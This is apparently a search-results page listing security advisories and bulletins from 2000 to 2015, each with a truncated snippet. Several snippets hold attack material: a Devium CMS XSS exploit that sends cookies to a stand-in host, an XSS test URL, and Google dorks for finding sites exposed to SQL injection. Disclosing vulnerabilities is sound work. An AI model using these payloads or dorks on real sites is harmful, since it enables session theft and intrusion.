47153 matches found
Microsoft Security Bulletin MS09-053 - Important Vulnerabilities in FTP Service for Internet Information Services Could Allow Remote Code Execution (975254)
Microsoft Security Bulletin MS09-053 - Important Vulnerabilities in FTP Service for Internet Information Services Could Allow Remote Code Execution 975254 Published: October 13, 2009 Version: 1.0 General Information Executive Summary This security update resolves two publicly disclosed...
osTicket v1.6 RC4 Admin Login Blind SQLi
nGenuity Information Services - Security Advisory Advisory ID: NGENUITY-2009-007 osTicket Admin Login Blind SQL Injection Application: osTicket v1.6 RC4 Vendor: osTicket Vendor website: http://www.osticket.com Author: Adam Baldwin [email protected] I. BACKGROUND "osTicket is a widely-us...
[Full-disclosure] [ GLSA 200906-02 ] Ruby: Denial of Service
Gentoo Linux Security Advisory GLSA 200906-02 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity:...
[Suspected Spam][Fwd: Re: Novell-QuickFinder Server Xss & Java remote execution Code]
NULL CODE SERVICES www.nullcode.com.ar Hunting Security Bugs! +================================================================================================================================+ + Novell-QuickFinder Server //Cross-site scripting XSS Remote Java Execution Code +...
[waraxe-2009-SA#070] - Multiple Vulnerabilities in MKPortal <= 1.2.1
waraxe-2009-SA070 - Multiple Vulnerabilities in MKPortal <= 1.2.1 ============================================================================== Author: Janek Vind "waraxe" Date: 15. January 2009 Location: Estonia, Tartu Web: http://www.waraxe.us/advisory-70.html Description of vulnerable software...
Telecom Italia Alice Pirelli routers backdoor discovered to activate telnet/ftp/tftp from internal LAN/WLAN.
saxdax & drpepperONE Discovered embedded backdoor to activate telnet/ftp/tftp/web extended admin interface with Admin privileges, from internal network lan on Alice ADSL CPE Modem/Router, manufactured by Pirelli based on Broadcom platform. saxdax & drpepperONE Router Vendor: Alice Telecom Italia...
Mozilla Foundation Security Advisory 2008-44
Mozilla Foundation Security Advisory 2008-44 Title: resource: traversal vulnerabilities Impact: Moderate Announced: September 23, 2008 Reporter: Boris Zbarsky, Georgi Guninski Products: Firefox, Thunderbird, SeaMonkey Fixed in: Firefox 3.0.2 Firefox 2.0.0.17 Thunderbird 2.0.0.17 SeaMonkey 1.1.12...
[SECURITY] [DSA 1636-1] New Linux 2.6.24 packages fix several vulnerabilities
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ---------------------------------------------------------------------- Debian Security Advisory DSA-1636-1 [email protected] http://www.debian.org/security/ dann frazier Sep 11, 2008 http://www.debian.org/security/faq -...
Cisco Security Advisory: Multiple Cisco Products Vulnerable to DNS Cache Poisoning Attacks
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Cisco Security Advisory: Multiple Cisco Products Vulnerable to DNS Cache Poisoning Attacks Advisory ID: cisco-sa-20080708-dns http://www.cisco.com/warp/public/707/cisco-sa-20080708-dns.shtml Revision 1.0 For Public Release 2008 July 08 1800 UTC GMT...
VMSA-2008-0009 Updates to VMware Workstation, VMware Player, VMware ACE, VMware Fusion, VMware Server, VMware VIX API, VMware ESX, VMware ESXi resolve critical security issues
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 - ------------------------------------------------------------------- VMware Security Advisory Advisory ID: VMSA-2008-0009 Synopsis: Updates to VMware Workstation, VMware Player, VMware ACE, VMware Fusion, VMware Server, VMware VIX API, VMware ESX,...
Apache2 Undefined Charset UTF-7 XSS Vulnerability
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Apache2 Undefined Charset UTF-7 XSS Vulnerability Author: SecurityReason Maksymilian Arciemowicz cXIb8O3 Date: - - Written: 08.08.2007 - - Public: 11.09.2007 SecurityReason Research SecurityAlert Id: 46 CVE: CVE-2007-4465 SecurityRisk: Low Affected...
Redirection Vulnerability in wp-pass.php, WordPress 2.2.1
The vulnerability found could allow an attacker to redirect victims to an arbitrary 3rd party site. This site could be a phishing site or contain malware allowing the attacker to steal account credentials or compromise hosts. This vulnerability can be found in Wordpress 2.2, however it is likely...
NeatUpload vulnerability and fix
Product: NeatUpload Synopsis: A race condition in several versions of the NeatUpload ASP.NET component could sometimes cause portions of responses to be sent to the wrong user, potentially revealing sensitive information to unauthorized users. Vulnerable versions: 1.2.11-1.2.16, 1.1.18-1.1.23, an...
CascadianFAQ <= 4.1 (index.php) Remote Blind SQL Injection Vulnerability
Title : CascadianFAQ <= 4.1 index.php Remote Blind SQL Injection Vulnerability Author : ajann Contact : : S.Page : http://eclectic-designs.com $$ : Free Dork : This FAQ is powered by CascadianFAQ DorkEx :...
Multiple HTTP response splitting vulnerabilities in SHOP-SCRIPT
Vendor: Shop-Script a division of WebAsyst LLC Application: Shop-Script www.shop-script.com I. Descriptions: Shop-Script is a PHP based shopping cart. Multiple links of shop-script are vulnerable to a new form of application attack technique called HTTP Response splitting aka CRLF Injection. HTTP...
MusicBox <= 2.3.4 XSS SQL injection Vulnerability
MusicBox 2.3.4 http://www.musicboxv2.com ------------ PHPinfo page ------------ /phpinfo.php -------------------------- Cross Site Scripting XSS -------------------------- http://www.target.xx/?id=scriptalert/EllipsisSecurityTest//script&page=0...
XSS in Devium CMS 1.5
Advisory: XSS in Devium CMS 1.5 Home Page: http://www.devium.net/ Vulnerability: XSS in the guestbook. Exploit: scriptimg = new Image; img.src = "http://sniffer/a.jpg?"+document.cookie;/script Vulnerability: Installation path disclosure in the admin panel:...
Microsoft Security Bulletin MS06-021
Microsoft Security Bulletin MS06-021 Cumulative Security Update for Internet Explorer 916281 Published: June 13, 2006 Version: 1.0 Summary Who should read this document: Customers who use Microsoft Windows Impact of Vulnerability: Remote Code Execution Maximum Severity Rating: Critical...
Microsoft Security Bulletin MS05-018 Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege and Denial of Service (890859)
Microsoft Security Bulletin MS05-018 Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege and Denial of Service 890859 Issued: April 12, 2005 Version: 1.0 Summary Who should read this document: Customers who use Microsoft Windows Impact of Vulnerability: Elevation of Privilege...
Blazix 1.2 jsp view and free protected folder access
Auriemma Luigi, PivX security advisory Application: Blazix http://www.blazix.com Version: 1.2 and previous Bug: Bad management of files requested with at the end some "bad" characters Risk low: An attacker can view jsp and other server side scripts with the ability to access any password protecte...
Security Update: [CSSA-2001-SCO.25] OpenServer: various scoadmin/sysadm subprograms have buffer overflows
To: [email protected] [email protected] [email protected] [email protected] Do not reply to this mail. This security advisory is being sent from a nonexistent address in order to avoid spam problems. Caldera's contact address for UNIX security issue...
Security Bulletin MS01-030
Title: Incorrect Attachment Handling in Exchange 2000 OWA Can Execute Script Date: 06 June 2001 Software: Microsoft Exchange 2000 Server Outlook Web Access Impact: Run code of attacker's choice Bulletin: MS01-030 Microsoft encourages customers to review the Security Bulletin at:...
Serv-U FTP directory traversal vulnerability (all versions)
===================================================================== Securax-SA-09 Security Advisory belgian.networking.security Dutch ===================================================================== Topic: Catsoft serv-U FTP Directory Transversal Vulnerability Announced: 2000-12-03 Updated...
[USN-2694-1] PCRE vulnerabilities
========================================================================== Ubuntu Security Notice USN-2694-1 July 29, 2015 pcre3 vulnerabilities ========================================================================== A security issue affects these releases of Ubuntu and its derivatives: - Ubun...
[SECURITY] [DSA 3291-1] drupal7 security update
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 - ------------------------------------------------------------------------- Debian Security Advisory DSA-3291-1 [email protected] https://www.debian.org/security/ Sebastien Delafond June 18, 2015 https://www.debian.org/security/faq -...
XSS vulnerability Adobe Connect 9.3 (CVE-2015-0343 )
Advisory: Adobe Connect Reflected XSS Author: Stas Volfus Bugsec Information Security LTD Vendor URL: http://www.adobe.com/ Status: Vendor Notified ========================== Vulnerability Description ========================== Adobe Connect Central version: 9.3 is vulnerable to Reflected XSS Cro...
[SECURITY] [DSA 3276-1] symfony security update
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------- Debian Security Advisory DSA-3276-1 [email protected] http://www.debian.org/security/ David Prevot May 31, 2015 http://www.debian.org/security/faq -...
[slackware-security] proftpd (SSA:2015-111-12)
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 slackware-security proftpd SSA:2015-111-12 New proftpd packages are available for Slackware 13.0, 13.1, 13.37, 14.0, 14.1, and -current to fix a security issue. Here are the details from the Slackware 14.1 ChangeLog: +--------------------------+...
Asterisk DoS
WebSocket Server request parsing DoS...
CVE-2014-6617 Softing FG-100 Backdoor Account
COMPASS SECURITY ADVISORY http://www.csnc.ch/en/downloads/advisories.html Product: Softing FG-100 PB Vendor: Softing AG www.softing.com CVD ID: CVE-2014-6617 Subject: Backdoor Account Risk: High Effect: Remotely exploitable Author: Ingmar Rosenhagen Daniel Marzin Johannes Klick Date: 05.11.2014...
[ MDVSA-2014:200 ] bugzilla
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Mandriva Linux Security Advisory MDVSA-2014:200 http://www.mandriva.com/en/support/security/ Package : bugzilla Date : October 21, 2014 Affected: Business Server 1.0 Problem Description: Updated bugzilla packages fix security vulnerabilities: If a new...
[Onapsis Security Advisory 2014-027] SAP HANA Multiple Reflected Cross Site Scripting Vulnerabilities
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Onapsis Security Advisory 2014-027: SAP HANA Multiple Reflected Cross Site Scripting Vulnerabilities 1. Impact on Business ===================== By exploiting this vulnerability a remote unauthenticated attacker would be able to attack other users of...
CVE-2014-4958: Stored Attribute-Based Cross-Site Scripting (XSS) Vulnerability in Telerik UI for ASP.NET AJAX RadEditor Control
All versions of the popular UI for ASP.NET AJAX RadEditor Control product by Telerik may be affected by a high-risk stored attribute-based cross-site scripting XSS vulnerability that is assigned CVE-2014-4958. This WYSIWYG rich text editor is “...what Microsoft chose to use in MSDN, CodePlex,...
CVE-2014-3577: Apache HttpComponents client: Hostname verification susceptible to MITM attack
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Security Advisory - Apache Software Foundation Apache HttpComponents / hc.apache.org Hostname verification susceptible to MITM attack CVE-2014-3577 / CVSS 1.4 Apache HttpComponents prior to revision 4.3.5/4.0.2 may be susceptible to a 'Man in the Midd...
python security vulnerabilities
json information leak, CGIHTTPServer unauthorized files access and code execution, lz4 integer overflow...
CVE-2014-2385 - Multiple Cross Site Scripting in Sophos Antivirus Configuration Console (Linux)
Vulnerability title: Multiple Cross Site Scripting in Sophos Antivirus Configuration Console Linux CVE: CVE-2014-2385 Vendor: Sophos Product: Antivirus Affected version: 9.5.1 Fixed version: 9.6.1 Reported by: Pablo Catalina Details: The Configuration Console of Sophos Antivirus 9.5.1 Linux does...
[ MDVSA-2014:114 ] squid
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Mandriva Linux Security Advisory MDVSA-2014:114 http://www.mandriva.com/en/support/security/ Package : squid Date : June 10, 2014 Affected: Business Server 1.0 Problem Description: Updated squid packages fix security vulnerability: Due to incorrect...
E-Store (1.0 & 2.0) <= SQL Injection Vulnerability
Exploit Author: Nawaf Alkeraithe ====================================== for "E-store 1.0": Google Dork: "Powered by: PD" inurl:"page.php?id" Vulnerable page: http://target/page.php?id=SQL Injection ====================================== for "E-store 2.0": Google Dork: "Powered by: PD"...
APPLE-SA-2014-03-10-1 iOS 7.1
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 APPLE-SA-2014-03-10-1 iOS 7.1 iOS 7.1 is now available and addresses the following: Backup Available for: iPhone 4 and later, iPod touch 5th generation and later, iPad 2 and later Impact: A maliciously crafted backup can alter the filesystem...
Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
PHP inclusions, SQL injections, directory traversals, cross-site scripting, information leaks, etc...
[USN-2035-1] Ruby vulnerabilities
========================================================================== Ubuntu Security Notice USN-2035-1 November 27, 2013 ruby1.8, ruby1.9.1 vulnerabilities ========================================================================== A security issue affects these releases of Ubuntu and its...
Cisco Identity Services Engine multiple security vulnerabilities
Authentication bypass, code execution...
[security bulletin] HPSBMU02883 SSRT101227 rev.1 - HP Data Protector, Remote Increase of Privilege, Denial of Service (DoS), Execution of Arbitrary Code
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emrna-c03781657 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c03781657 Version: 1 HPSBMU02883...
[USN-1801-1] curl vulnerability
========================================================================== Ubuntu Security Notice USN-1801-1 April 16, 2013 curl vulnerability ========================================================================== A security issue affects these releases of Ubuntu and its derivatives: - Ubuntu...
[USN-1787-1] Linux kernel vulnerabilities
========================================================================== Ubuntu Security Notice USN-1787-1 April 02, 2013 linux vulnerabilities ========================================================================== A security issue affects these releases of Ubuntu and its derivatives: -...
Multiple XSS vulnerabilities in IBM Lotus Domino
Hello 3APA3A! I want to warn you about multiple Cross-Site Scripting vulnerabilities in IBM Lotus Domino. Last year I've announced multiple vulnerabilities in IBM software and after IBM fixed many of them, I've disclosed them. These are new vulnerabilities in Domino, which I've found at 03.05.201...
[SECURITY] [DSA 2616-1] nagios3 security update
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------- Debian Security Advisory DSA-2616-1 [email protected] http://www.debian.org/security/ Jonathan Wiltshire February 03, 2013 http://www.debian.org/security/faq -...
US-CERT Alert TA13-010A - Oracle Java 7 Security Manager Bypass Vulnerability
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 National Cyber Awareness System US-CERT Alert TA13-010A Oracle Java 7 Security Manager Bypass Vulnerability Original release date: January 10, 2013 Last revised: -- Systems Affected Any system using Oracle Java 7 1.7, 1.7.0 including Java Platform...
[SECURITY] [DSA 2579-1] apache2 security update
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------- Debian Security Advisory DSA-2579-1 [email protected] http://www.debian.org/security/ Stefan Fritsch November 30, 2012 http://www.debian.org/security/faq -...
[USN-1595-1] libxslt vulnerabilities
========================================================================== Ubuntu Security Notice USN-1595-1 October 04, 2012 libxslt vulnerabilities ========================================================================== A security issue affects these releases of Ubuntu and its derivatives: -...